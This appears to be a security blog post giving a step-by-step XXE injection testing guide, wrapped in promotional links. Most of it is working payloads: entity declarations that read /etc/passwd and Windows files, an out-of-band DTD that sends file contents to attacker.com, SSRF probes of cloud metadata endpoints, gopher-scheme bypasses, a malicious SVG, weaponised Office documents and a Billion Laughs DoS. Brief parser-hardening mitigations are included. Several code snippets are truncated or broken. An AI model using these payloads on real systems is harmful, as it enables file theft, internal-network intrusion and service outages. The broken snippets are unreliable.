Listen to this Post
Introduction:
XML External Entity (XXE) injection remains one of the most underestimated yet devastating vulnerabilities in modern web applications. Attackers leverage improperly secured XML parsers to read local files, perform server-side request forgery (SSRF), launch denial-of-service attacks, or exfiltrate sensitive data through out-of-band channels. With the resurgence of XML in legacy SOAP services, SAML authentication, and even modern REST APIs that accept `application/xml`, every penetration tester must master a systematic XXE testing methodology.
Learning Objectives:
– Identify all potential XML input vectors across APIs, file uploads, and mobile traffic.
– Execute blind XXE attacks using OOB data exfiltration and error-based techniques.
– Apply mitigation strategies including secure parser configuration and input validation.
1. Mapping the Attack Surface: Discovering XML Input Points
Before firing payloads, you must locate every endpoint that processes XML. Many testers focus only on `Content-Type: application/xml`, but XXE lurks in unexpected places.
Step‑by‑Step Guide:
1. Inspect API documentation – Look for SOAP endpoints (typically `/soap`, `/webservice`, `/api/v1/soap`) and REST endpoints that advertise `application/xml` or `text/xml` in `Accept` or `Content-Type` headers.
2. Analyze file upload features – Upload a simple `test.xml` file and observe how the server responds. Also test SVG images (which are XML), Office Open XML documents (`.docx`, `.xlsx`, `.pptx` – rename to `.zip` to inspect embedded XML), and configuration files like `.config`, `.wsdl`, or `.rss`.
3. Monitor mobile app traffic – Use Burp Suite or mitmproxy to intercept requests. Many mobile backends still use XML-based protocols even when the UI is JSON.
4. Check SAML authentication – Decode SAML requests/responses (Base64). If they contain XML, attempt XXE during single sign-on flows.
Useful Commands:
– Linux – Recursively search for XML endpoints in source code:
`grep -rni “text/xml\|application/xml\|\.wsdl” /path/to/codebase`
– Windows – Find SOAP endpoints in IIS logs:
`findstr /i “soap .wsdl” C:\inetpub\logs\LogFiles\.log`
– Burp Suite – Configure passive scanning for XML content types under Target > Scope.
2. Basic XXE Exploitation for Local File Disclosure
Once you identify an XML parser, test for classic XXE by defining an external entity pointing to a local file. Success is indicated when file contents appear in the response, error messages, or generated output (e.g., PDF invoices, HTML reports).
Step‑by‑Step Guide:
1. Inject the following DOCTYPE declaration into any XML element value (e.g., `
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root>&xxe;</root>
2. For Windows targets, use `file:///c:/windows/win.ini` or `file:///c:/boot.ini`.
3. If the application displays the XML output, the file contents appear directly.
4. If the parser is non‑validating but still resolves entities, try:
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "file:///etc/hosts"> %xxe; ]>
5. Test error-based disclosure – Reference a non‑existent file to trigger verbose errors:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///nonexistent.txt"> ]>
Commands to Verify Local File Paths (Linux/Windows):
– Linux – Common sensitive files: `/etc/passwd`, `/etc/shadow`, `/etc/hosts`, `/proc/self/environ`
– Windows – Common files: `C:\Windows\win.ini`, `C:\Windows\System32\drivers\etc\hosts`, `C:\inetpub\wwwroot\web.config`
– Test with cURL:
`curl -X POST https://target.com/api/xml -H “Content-Type: application/xml” -d “@/payload.xml”`
3. Blind XXE Out‑of‑Band (OOB) Exfiltration
When file contents are not reflected in responses, use blind XXE with a remote server you control. The parser will issue DNS/HTTP requests to your server, potentially leaking data via parameter entities.
Step‑by‑Step Guide:
1. Set up a listener – Use Python’s HTTP server on your attacking machine:
– Linux: `python3 -m http.server 8080` or `sudo nc -lnvp 80`
– Windows (PowerShell): `python -m http.server 8080` or using `netcat` for Windows.
2. Create an external DTD file (e.g., `oob.dtd`) hosted at `http://attacker.com/oob.dtd`:
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &x25; exfil SYSTEM 'http://attacker.com:8080/?data=%file;'>"> %eval; %exfil;
3. Inject the following payload into the target XML:
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://attacker.com/oob.dtd"> %xxe; ]>
4. Monitor your listener logs. If successful, you will see HTTP requests containing the file data (e.g., `?data=root:x:0:0…`).
5. For blind SSRF via OOB – Replace the DTD with a request to internal services (e.g., `http://169.254.169.254/latest/meta-data/` on AWS).
Tool Configurations:
– Burp Collaborator – Built‑in OOB detection. Insert `http://YOUR-COLLABORATOR-ID.burpcollaborator.net` as the external server.
– Ngrok – Expose your local listener: `ngrok http 8080`
4. SSRF via XXE: Pivoting to Internal Networks
XXE can be weaponized to scan internal networks, access cloud metadata APIs, and exploit internal services that are not internet‑facing.
Step‑by‑Step Guide:
1. Replace the file URI with an internal HTTP address:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"> ]> <root>&xxe;</root>
2. Test for timing differences – Use `http://10.0.0.1:8080` vs `http://10.0.0.1:9999` (closed port). Latency indicates open port.
3. Exploit internal Redis/Memcached – Send malicious commands via `http://internal-redis:6379/` using CRLF injection in the URI.
4. Bypass SSRF filters – Use alternative schemes: `gopher://`, `dict://`, `ftp://`. Example for internal Elasticsearch:
<!ENTITY xxe SYSTEM "gopher://elasticsearch:9200/_search">
5. Cloud metadata protection bypass – Many cloud providers block the standard endpoint. Try:
– AWS: `http://169.254.169.254/latest/user-data/`
– GCP: `http://metadata.google.internal/computeMetadata/v1/`
– Azure: `http://169.254.169.254/metadata/instance?api-version=2017-08-01` (add `Metadata: true` header if possible)
Mitigation Commands (for defenders):
– Linux iptables – Block outgoing requests to internal IP ranges from application servers:
`iptables -A OUTPUT -d 169.254.0.0/16 -j DROP`
– AWS Security Group – Restrict egress to metadata service via VPC endpoint policies.
5. File Upload XXE: SVG, Office Documents, and Archives
File upload features are prime XXE vectors because they often parse XML metadata without proper sanitization.
Step‑by‑Step Guide:
1. Craft a malicious SVG (save as `evil.svg`):
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <svg width="100" height="100" xmlns="http://www.w3.org/2000/svg"> <text x="10" y="20">&xxe;</text> </svg>
2. Upload the SVG – If the server generates thumbnails, the file contents appear inside the image description or error.
3. For Office documents (`.docx`, `.xlsx`):
– Extract the archive: `unzip document.docx -d docx_src`
– Edit `docx_src/word/document.xml` to inject the XXE payload.
– Repack: `cd docx_src && zip -r ../poc.docx `
– Upload the modified document.
4. Test XML-based import/export features – Many enterprise apps allow bulk XML uploads (e.g., system configuration exports). Use the same external entity payload.
5. Monitor for asynchronous processing – The XXE may trigger hours later when a batch job reads the uploaded file.
Linux/Windows Commands for Payload Generation:
– Linux – Create ZIP with modified XML:
`unzip invoice.docx -d invoice/ && sed -i ‘s/INVOICE_DATA//’ invoice/word/document.xml && cd invoice && zip -r ../evil.docx `
– Windows PowerShell – Extract and repack:
`Expand-Archive invoice.docx invoice; (Get-Content invoice\word\document.xml) -replace “OLD”, “PAYLOAD” | Set-Content invoice\word\document.xml; Compress-Archive -Path invoice\ -DestinationPath evil.docx`
6. Parameter Entities and Chained Expansion
Parameter entities (defined with `%`) allow recursive attacks, including XML bombs (denial of service) and multi‑step exfiltration when direct file inclusion is blocked.
Step‑by‑Step Guide:
1. Test if parameter entities are enabled:
<?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY % test "Hello"> %test; ]> <root>test</root>
If the parser doesn’t crash, parameter entities are supported.
2. Chain entities to bypass validation – Use an external DTD to perform double expansion:
– Local payload: ` %xxe; ]>`
– External `chain.dtd`:
<!ENTITY % param1 SYSTEM "file:///etc/passwd"> <!ENTITY % param2 "<!ENTITY &x25; exfil SYSTEM 'http://attacker.com/?%param1;'>"> %param2; %exfil;
3. Test Billion Laughs attack (DoS) – Uncomment with caution:
<!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;"> ... ]>
4. Monitor CPU/memory usage – This can crash the server, so only perform on authorized test systems.
Mitigation (for developers):
– Disable external entity processing – Java (SAXParserFactory): `factory.setFeature(“http://apache.org/xml/features/disallow-doctype-decl”, true)`
– Python (lxml): `parser = etree.XMLParser(resolve_entities=False, no_network=True)`
– .NET: `XmlReaderSettings settings = new XmlReaderSettings(); settings.DtdProcessing = DtdProcessing.Prohibit;`
What Undercode Say:
– Key Takeaway 1 – XXE is not a legacy issue. Modern single-page applications that accept XML for backward compatibility, cloud metadata endpoints, and even CI/CD pipelines processing XML reports remain critically exposed.
– Key Takeaway 2 – Blind XXE with OOB exfiltration is the most reliable technique in 2026, but many pentesters skip it because they lack a proper listener infrastructure. A simple HTTP server or Burp Collaborator can turn a “no output” case into full compromise.
Analysis (10 lines):
The checklist provided originally covers the essential phases of XXE testing, but lacks concrete command-level examples and mitigation strategies. By extending it with Linux/Windows commands and real‑world payloads, we bridge the gap between theory and execution. XXE often goes undetected due to modern security tools focusing on SQLi and XSS. However, XML parsers are rarely upgraded in legacy internal applications, and cloud metadata endpoints remain prime targets. A single XXE can lead to RCE via SSRF into internal Jenkins, Docker APIs, or Redis. Defenders must adopt a “deny by default” policy for external entities and regularly fuzz file upload endpoints. Moreover, development teams should migrate away from XML for new services, but for existing ones, use safe parser configurations and network egress controls. The rise of AI‑generated code has reintroduced outdated XML libraries in prototype applications, making XXE a recurring finding in bug bounty programs.
Prediction:
– -1 Resurgence of XML in microservices – As organizations adopt API gateways and legacy SOAP wrappers for mainframe integration, misconfigured XML parsers will spike, leading to critical SSRF breaches in cloud environments by 2027.
– +1 Automated XXE discovery tools – Next‑generation fuzzers will integrate parameter‑entity chaining and OOB callback detection, reducing manual effort and increasing bug bounty payouts for researchers.
– -1 AI‑generated code vulnerability – Large language models frequently output XML processing code with insecure default configurations (e.g., `resolve_entities=True` in Python), causing a new wave of XXE in otherwise secure applications.
▶️ Related Video (82% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
[Join Undercode Academy for Verified Certifications](https://undercode.co.uk/certifications/)
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[[email protected]](mailto:[email protected])
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: [Deepmarketer Xxe](https://www.linkedin.com/posts/deepmarketer_xxe-testing-checklist-ugcPost-7468106978737823746-T3zW/) – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
[💬 Whatsapp](https://undercode.help/whatsapp) | [💬 Telegram](https://t.me/UndercodeCommunity)
📢 Follow UndercodeTesting & Stay Tuned:
[𝕏 formerly Twitter 🐦](https://x.com/undercodeupdate) | [@ Threads](https://www.threads.net/@undercodetesting) | [🔗 Linkedin](https://www.linkedin.com/company/undercodetesting/) | [🦋BlueSky](https://bsky.app/profile/undercode.bsky.social)
